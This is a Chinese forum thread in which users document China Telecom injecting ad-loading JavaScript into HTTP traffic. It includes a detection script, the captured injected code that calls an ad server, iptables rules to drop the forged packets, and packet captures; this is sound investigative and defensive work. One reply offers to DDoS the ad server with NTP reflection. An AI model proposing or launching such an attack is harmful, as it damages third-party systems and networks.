Home Sign Up Sign In
mario85

电信宽带流量劫持广告复现过程

  •   
  •   mario85 · Mar 29, 2018 · 4407 views
    This topic created in 2976 days ago, the information mentioned may be changed or developed.

    已知广东电信宽带会随机弹出广告窗口(无图,见过的都知道),由于出现得比较随机,一直不太好复现,这几天有点时间研究了下,写了个脚本复现:

    host='mat1.gtimg.com'
path='/www/asset/seajs/sea.js'
referer='http://www.qq.com/'
useragent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'

while :
do
   hostips=$(nslookup $host|grep -Po '(?<=Address: ).*$')
   count=$(echo -e "$hostips"|wc -l)
   randresolv=$(echo -e "$hostips"|tail -$((1+RANDOM%count))|head -1)
   date=$(date)
   content=$(curl -s -N --no-keepalive http://$randresolv$path -H "Host: $host" -H "User-Agent: $useragent" -H "Referer: $referer" -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache')
   if echo $content|grep -q 183.59; then
      logtext=$(echo "ChinaTelecom javascript hijacking detected - $randresolv - $date")
      printf "\n$logtext"
      echo $logtext >> ./checklog
      echo $content > ./capturedcontent
   else
      printf .
   fi
   sleep 10
done

    电信只劫持 URL 以.js 结尾、有 Referer 头的 HTTP 请求,上网随便找个 js,以腾讯首页中的 SeaJS 为例,将相应信息填入脚本中的host path referer 变量,执行脚本,一段时间(可达一两个小时)后即可出现劫持,劫持频率大概是每 1 到 10 个请求随机出现一次劫持。

    运行效果如下图所示: http://ww2.sinaimg.cn/large/0060lm7Tly1fptp6dvpy0j30h20933z0.jpg

    劫持后替换的内容:

    var _atn_obj_ = new Object; 
 _atn_obj_.oldurl = 'http://mat1.gtimg.com/www/asset/seajs/sea.js?cHVzaA=100745'; 
 _atn_obj_.unified_url = 'http://183.59.53.197:3737/remind_adv/ad_unified_access?SP=ABzs...zoPP'; 
 window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); 
 window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

    不知道这样算不算是实锤,如果算的话周末准备投诉到 10000,若不见效将写详细报告投诉到工信部

  • echo
  • atn_obj_
  • 劫持
  • ment
    24 replies    2018-05-24 01:05:40 +08:00
    silencefent
        1
    silencefent  
       Mar 29, 2018
    没用哒
    LGA1150
        2
    LGA1150  
       Mar 29, 2018 via Android
    是 301/302 跳转吗?可以暂时在路由器上 iptables 过滤抢答包
    iptables -I FORWARD -p tcp --sport 80 -m string --string "Location: http://183.59.53." --algo bm -j DROP
    (自行去掉自动被 V2 添加的分号)
    还可以加个 TTL 匹配,减少负荷
    Telegram
        3
    Telegram  
       Mar 29, 2018 via iPhone
    最多给你添加到白名单,不给你劫持,要让他停止这种行为,不可能的。
    mario85
        4
    mario85  
    OP
       Mar 29, 2018
    @LGA1150 不是 302,是直接劫持返回 200 和广告内容
    mario85
        5
    mario85  
    OP
       Mar 29, 2018
    @Telegram 投工信部也没用?
    我到时随便找别的账号看看,要是还在劫持我就不结案
    yexm0
        6
    yexm0  
       Mar 29, 2018 via iPhone
    没用的,闹到最后顶多就是退钱让你滚蛋。想不要劫持是不可能的
    另外你比其他受害者好多了,别人家看到的是黄赌(毒好像还没)相关的东西
    /t/403438
    /t/396849
    LGA1150
        7
    LGA1150  
       Mar 29, 2018 via Android
    @mario85 那就过滤这个 200
    300
        8
    300  
       Mar 29, 2018
    电信只劫持 URL 以.js 结尾 ———>
    可能根据地区不同吧,空白页面也会有广告,就是那种一个字符都没有的网页

    劫持还会识别是否是移动设备,有个 js 文件会判断

    找客服直接说关闭劫持,她就懂了,不过没有承认劫持,只是反复强调机房那边会处理
    mario85
        9
    mario85  
    OP
       Mar 29, 2018
    @LGA1150 过滤 200,原内容要没了
    现在情况是,访问时有可能直接返回正常内容,有可能返回广告脚本,都是 200
    只是返回包头略有不同,有个 Expire 字段
    mario85
        10
    mario85  
    OP
       Mar 29, 2018
    @winterbells 什么都不做也可能出现广告,其实也就是浏览器或者其他后台进程开了 js,被劫持直接弹出来
    mario85
        11
    mario85  
    OP
       Mar 29, 2018
    @yexm0 反正两年合约,毁约还能赚一笔
    根据经验全市都有这个情况,要是黄毒什么的那电信死定了
    learnshare
        12
    learnshare  
       Mar 29, 2018
    即便投诉他,也只会针对你家处理一下而已
    毕竟隐私的钱很好赚
    mario85
        13
    mario85  
    OP
       Mar 29, 2018
    @learnshare 反正认识的人多得很,去别人家喝杯茶连个 WiFi 跑下脚本,还出现的话就不说问题解决
    篡改用户流量貌似属于违法,现在是传广告,谁知道他们会不会悄咪咪的做别的事情
    https://www.zhihu.com/question/20723856
    hicdn
        14
    hicdn  
       Mar 29, 2018
    停止是不可能的,参见之前国务院 APP 被劫持。
    LGA1150
        15
    LGA1150  
       Mar 29, 2018 via Android
    @mario85 抓包看是有两个 200 ?按 TTL 过滤劫持那个
    learnshare
        16
    learnshare  
       Mar 29, 2018
    @mario85 别的事情肯定要做,钱当然是越多越好了
    mario85
        17
    mario85  
    OP
       Mar 29, 2018
    @LGA1150 目前还只是简单 F12 了一下,还没用 WireShark 之类的看过
    t895
        18
    t895  
       Mar 30, 2018 via iPhone
    刚刚好撸了个 ntp 反弹,大概 200G 左右,试试打下这个服务器
    ShareDuck
        19
    ShareDuck  
       Apr 1, 2018 via Android
    关于广告这个问题,第一次是投诉到工信部才解决的,之后的都是 10000 号搞定了。
    qwertyegg
        20
    qwertyegg  
       Apr 1, 2018
    这种情况,用 opendns 是不是能解决?
    feng0vx
        21
    feng0vx  
       Apr 1, 2018 via Android
    没用的,工信部现在都没用了,我投诉过广告的事情,他们回电话说合同上没有约束,他们管不了
    wr410
        22
    wr410  
       Apr 1, 2018
    很多年前写的博文,直接拉到最后,了解一下
    https://blog.csdn.net/wr410/article/details/25594273
    wolfie
        23
    wolfie  
       Apr 2, 2018
    给客服打电话可以关。
    https 都劫持 有什么隐私可言呢
    LGA1150
        24
    LGA1150  
       May 24, 2018
    我似乎抓到劫持包了
    似乎所有的劫持包都有一个变量"_atn_obj_"
    于是用 iptables 关键字匹配:
    iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m string --string "_atn_obj_" --algo bm -j LOG
    同时后台开着 tcpdump
    直到内核日志中出现一条:
    [54945.458949] IN=pppoe-wan OUT=ct MAC= SRC=119.23.80.130 DST=10.2.1.2 LEN=894 TOS=0x00 PREC=0x00 TTL=56 ID=9997 DF PROTO=TCP SPT=80 DPT=45021 WINDOW=256 RES=0x00 ACK PSH URGP=0

    然后我过滤抓包结果:
    00:35:20.051969 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [S], seq 296045250, win 64240, options [mss 1432,sackOK,TS val 3110253 ecr 0,nop,wscale 8], length 0
    00:35:20.060124 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [S.], seq 4085280, ack 296045251, win 14600, options [mss 1444,nop,nop,sackOK,nop,wscale 7], length 0
    00:35:20.071531 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1, win 251, length 0
    00:35:20.073405 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 1:1530, ack 1, win 251, length 1529: HTTP: GET /static/image/mobile/styletouch.css HTTP/1.1
    00:35:20.081913 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1433, win 137, length 0
    00:35:20.082025 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1530, win 137, length 0
    00:35:20.094693 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 1:245, ack 1530, win 137, length 244: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.106128 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 245, win 256, length 0
    00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1
    00:35:20.110765 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 2962:3040, ack 245, win 256, length 78: HTTP
    00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
    00:35:20.129715 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 3040, win 159, length 0
    00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.150041 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:20.154660 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:20.361116 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.394913 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:20.582203 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:20.799507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.817570 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:21.021165 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:21.675574 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:21.715799 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:21.904377 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:23.427507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:23.454270 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:26.931735 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:27.118104 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [R], seq 296048290, win 0, length 0

    可以看到
    00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
    这个就是返回的 200 劫持,而真正的服务器返回的是
    00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified

    根据关键字、TCP FLAGS 和 TTL 匹配包并 DROP 掉
    iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m ttl --ttl-eq 55 --tcp-flags ALL PSH,ACK -m string --string "_atn_obj_" --algo bm -j DROP

    存放广告内容的服务器 IP 有 183.59.53.187 183.59.53.188 183.59.53.224 ,po 主的是 183.59.53.197 ,看来可以放心地把整段 IP 屏蔽了
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   958 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 68ms · UTC 22:18 · PVG 06:18 · LAX 15:18 · JFK 18:18
    ♥ Do have faith in what you're doing.